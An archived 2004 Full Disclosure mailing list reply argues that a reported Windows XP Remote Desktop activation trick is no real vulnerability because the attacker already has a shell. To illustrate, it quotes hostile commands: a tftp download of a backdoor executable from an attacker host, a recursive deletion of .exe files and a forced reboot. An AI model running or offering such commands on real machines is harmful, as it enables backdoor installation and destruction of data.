Full Disclosure: Re: XP Remote Desktop Remote Activation

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Re: XP Remote Desktop Remote Activation

From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 2 Oct 2004 09:05:25 -0700

a malicious user who has already gained a command shell to activate


umm... you already own the box.
try... 
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )

or

c:\del *.exe /s
c:\shutdown -r

I realy do not see the SECURITY ISSUE here.


cheers,
m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

By Date By Thread

Current thread:

XP Remote Desktop Remote Activation Fixer (Oct 02)
- Re: XP Remote Desktop Remote Activation morning_wood (Oct 02)
  - Re: XP Remote Desktop Remote Activation Joel R. Helgeson (Oct 02)
- RE: XP Remote Desktop Remote Activation Dominick Baier (Oct 02)
  - Re: XP Remote Desktop Remote Activation Fixer (Oct 02)
- RE: XP Remote Desktop Remote Activation Larry Seltzer (Oct 02)
- Re: XP Remote Desktop Remote Activation H D Moore (Oct 03)